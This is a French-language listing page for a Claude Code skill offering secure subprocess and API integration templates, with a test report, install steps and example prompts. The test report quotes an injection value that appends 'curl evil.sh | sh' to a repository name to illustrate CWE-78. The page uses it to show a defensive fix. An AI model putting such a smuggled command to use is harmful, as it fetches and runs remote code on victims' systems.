API Integration Patterns
Modèles API/CLI sécurisés pour les sous-processus : pas de shell=True, commandes en liste blanche, backoff de nouvelle tentative, validation de jeton.
Testé · Fonctionne
Ce que fait
Une compétence de modèles de référence qui fournit des modèles de code pour les sous-processus sécurisés, GitHub CLI, les nouvelles tentatives avec backoff, l'authentification et la limitation de débit lorsque Claude écrit du code d'intégration d'API ou CLI externe. Se déclenche sur les mots-clés subprocess/gh-cli/API-call/retry/auth et exclut explicitement les modifications de fonctions internes ou de configuration uniquement.
Rapport de test
Véritable test CWE-78 : le code de base utilisait shell=True avec un nom de dépôt en f-string, permettant à une valeur de dépôt conçue d'ajouter 'curl evil.sh | sh' ; la version de la compétence avec tableau argv + shell=False a fait passer la même chaîne malveillante via gh comme un seul argument inerte. Concret, pas cosmétique.
Testé le: 2026-07-15 · Claude Code 2.x (agent harness)
Installation
git clone https://github.com/akaszubski/autonomous-dev cd autonomous-dev mkdir -p ~/.claude/skills cp -r plugins/autonomous-dev/skills/api-integration-patterns ~/.claude/skills/api-integration-patterns
Commandes et exemples de prompts
/api-integration-patternsModèles API/CLI sécurisés pour les sous-processus : pas de shell=True, commandes en liste blanche, backoff de nouvelle tentative, validation de jeton.
Les skills se déclenchent sur des demandes en langage courant — aucune commande à retenir. Après installation, des prompts comme ceux-ci l'activent (en anglais) :
Write a Python function that lists GitHub issues via the gh CLIAdd retry logic with exponential backoff to my API client codeHelp me safely handle subprocess calls without shell injection risk